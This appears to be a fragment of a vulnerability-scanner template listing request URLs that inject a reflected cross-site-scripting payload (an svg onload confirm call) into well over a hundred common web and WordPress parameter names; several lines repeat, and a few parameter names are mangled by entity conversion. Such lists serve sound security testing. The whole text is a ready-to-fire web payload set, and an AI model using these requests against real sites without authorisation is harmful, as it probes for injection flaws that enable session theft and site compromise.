- "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E"
|
- "tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E"
|
||||||
- "{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E"
|
- "order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E"
|
||||||
- "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E"
|
- "i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E"
|
||||||
- "{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E"
|
- "subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E"
|
||||||
- "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E"
|
- "attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E"
|
||||||
- "{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E"
|
- "sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E"
|
||||||
- "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E"
|
- "ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E"
|
||||||
- "{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E"
|
- "image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E"
|
||||||
- "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E"
|
- "up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E"
|
||||||
- "{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E"
|
- "option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E"
|
||||||
- "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E"
|
- "taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E"
|
||||||
- "{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E"
|
- "deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E"
|
||||||
